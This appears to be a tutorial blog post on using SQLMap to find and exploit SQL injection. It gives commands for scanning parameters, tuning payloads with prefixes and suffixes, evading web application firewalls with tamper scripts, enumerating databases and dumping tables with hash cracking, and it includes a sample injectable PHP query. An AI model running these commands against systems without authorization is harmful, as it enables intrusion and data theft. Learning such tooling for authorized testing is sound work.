Mastering SQLMap Tool for Effective SQL Injection Testing

sqlmap logo

SQLMap is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws.

Talking about SQL injection, it’s a web vulnerability that allows attackers to interfere with the queries, an application makes to its database. By injecting malicious SQL code into input fields, attackers can bypass authentication, retrieve, modify, or delete database data, and even execute administrative operations on the database.

It supports the following types of SQL injections:

Boolean-based blind (B) — Determines true/false conditions based on changes in the web application’s responseError-based (E)— Extracts information through database error messagesUnion query-based(U) — Retrieves data by combining results from a legitimate query with a malicious one using the UNION operatorStacked queries (S)— Executes multiple SQL queries in a single statement to perform additional database actionTime-based blind (T)— Infers data by causing delays with time-based functions and measuring response timesInline queries (I)— Injects malicious SQL into a subquery or expression within the original query

It can be simply installed in Debian-based Linux as:

$ sudo apt install sqlmap

1. Basic listing

sqlmap -h

2. Advanced listing

sqlmap -hh

💡To Remember: Basic listing shows only the basic options and switches, sufficient in most cases while advanced listing shows all options.

3. Scan for SQLi vulnerabilities

Syntax:

sqli -u <target_URL>

OR, sqli <target_URL>

Example:

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Flags:

-u : specifies the url of target--batch : bypasses the SQLMap prompts by choosing the default options automatically

💡To Remember: This one is for testing GET request, as you can see the query string.

✨ Extra: To understand more about the — — batch flag, consider manually entering the prompts as Y or N in the middle of SQLmap testing, but if you use the flag, the default prompts will be chosen in each cases so that you can skip entering them manually a number of times.

4. Testing for POST request

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Flag:

--data : specifies the POST request body data

💡To Remember: This command testes for all the parameters of the body for SQL injection. In order to specify only a certain parameter which you might find probably vulnerable to SQL injection, by specifying the injection point there. We need to use an asterisk(*) character as in the command shown below:

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

5. Extracting data from a table

Example:

sqlmap -u "http://www.example.com/vuln.php?id=1" -D "testdb" -T "users" --dump

Flags:

-D : specifies the database-T : specifies the table--dump : dumps the contents of the specified table

✨ Extra: You can only use the flag -T for specifying the table to dump its contents, in case you are unable to know the database name.

You can find the methods for specifying the GET and POST request above, in the basic usage. For some other methods that you can use to specify requests, here are some that are mentioned.

1. Testing for PUT request

sqlmap -u example.com --data='id=1' --method PUT

Flags:

--method : specifies the HTTP method

2. Scanning with cookie header specification

sqlmap -u www.example.com --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Alternatively,

We can also specify the cookie with -H flag which denotes the header specification in the command.

sqlmap -u www.example.com -H='Cookie:PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

💡To Remember: We can also use the -H to specify the other headers of the request.

3. Scanning with full HTTP request

If we need to specify a complex HTTP request with lots of different header values and an elongated POST body, we can use the -r flag.

sqlmap -r req.txt

💡To Remember: The req.txt file should be containing all the headers and body from the HTTP request which is copied from the request intercepted with web proxy like Burp.

🪄 Pro Tip: We can also specify the JSON in the txt file. Also, an alternative way for the above method:

Utilize the Copy as cURL from the Browser Dev Tools to copy the request with curl command.

Browser Dev Tool (Mozialla Firefox)

Now, replace the curl command with sqlmap in order to make the request with sqlmap for testing SQLi in the shell.

This could look like the following after replacing:

sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

Tuning SQLi attacks

Sometimes, we might need to tune the attacks by specifying various options in the command in order to make the injection successful, in the case where we might be suspicious about the vulnerability in the target, but the default command does not give us the result.

1. With prefix/suffix

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

💡To Remember: Here, the flags used above specify the prefix and suffix to add in the payload for SQLi. This is done in order to make the injection successful by handling the characters.

✨ Extra: In order to understand more for the above command, lets consider a code:

$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);
On using prefix and suffix the characters are handled specifically for successful injection of payload, which could make the query look like the following:
SELECT id,name,surname FROM users WHERE id LIKE (('test%')) UNION ALL SELECT 1,2,VERSION()-- -')) LIMIT 0,1

2. With level/risk and verbosity

sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

Verbosity:

It increases the amount of information displayed. It is specified with -v flag. It ranges from 0 to 6 (default 1).

Level:

it defines the intensity and depth of tests that SQLMap performs. It is specified with — — level flag. The level ranges from 1 to 5 (default 1).

Risk:

It makes the attack more aggressive, but with the drawbacks of being more detectable by WAFs and IDS. It is specified with — — risk flag. The level ranges from 1 to 3 (default 1).

Other tuning methods:

Status codes

If the difference between TRUE and FALSE responses can be seen in the HTTP codes (e.g. 200 for TRUE and 500 for FALSE), the option --code could be used to fixate the detection of TRUE responses to a specific HTTP code (e.g. --code=200).

2. Strings

This is for specifying the string which appears in the TRUE response. Eg. --string=success

3. Techniques

This is for narrowing the injection techniques used for testing. You can find the injection techniques above in this article. Eg. --technique=BEU. The BEU indicates that the sqlmap would perform only blind based, error based and union based attacks.

4. UNION SQLi testing

Some flags:

--union-cols=6: specifies the columns of the tables for UNION SQLi--union-from=users: for Oracle database, specifies the table name in the form of the FROM <table> for UNION query

Bypassing Web protections for the scan

Important flags:

--skip-waf : Tries to bypass or avoid detection by Web Application Firewalls (WAFs) or Intrusion Prevention Systems (IPS) that might be protecting the target website.--tamper : Applies custom scripts that modify (or obfuscate) SQL injection payloads in order to bypass the security mechanisms. Eg. --tamper=between,randomcase, where between replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND # and randomcase replaces each keyword character with random case value (e.g. SELECT -> SEleCt).

For all tamper scripts, visit HERE.

Example Usage:

sqlmap -u "http://www.target.com/vuln.php?id=1" --tamper=between,randomcase

Enumerating database

After finding successful SQL injection in a URL, you can use the following flags to enumerate the database.

--is-dba: checks if the current database user has Database Administrator (DBA) privileges or not, if yes you have significant control over the database and can carry out high-level administrative tasks--schema: provides a complete view of the database architectural schema--search : searches for any databases, tables or columns, eg. --search -T user searches for the table “user”, also -D with database name and -C with column name can be used for searching

Example Usage:

sqlmap -u "http://www.target.com/vuln.php?id=1" --search -T user

✨ Extra: SQLMap also tries to crack the password hashes with --dump flag for the password hashes values present in the users table.

Looks like we have learned quite many of the handy techniques for using SQLMap tool, so that we can test SQL injection more efficiently.

Feel free to contact me for any queries or just to say Hello.

Linkedin

Discord

Instagram

Github

Twitter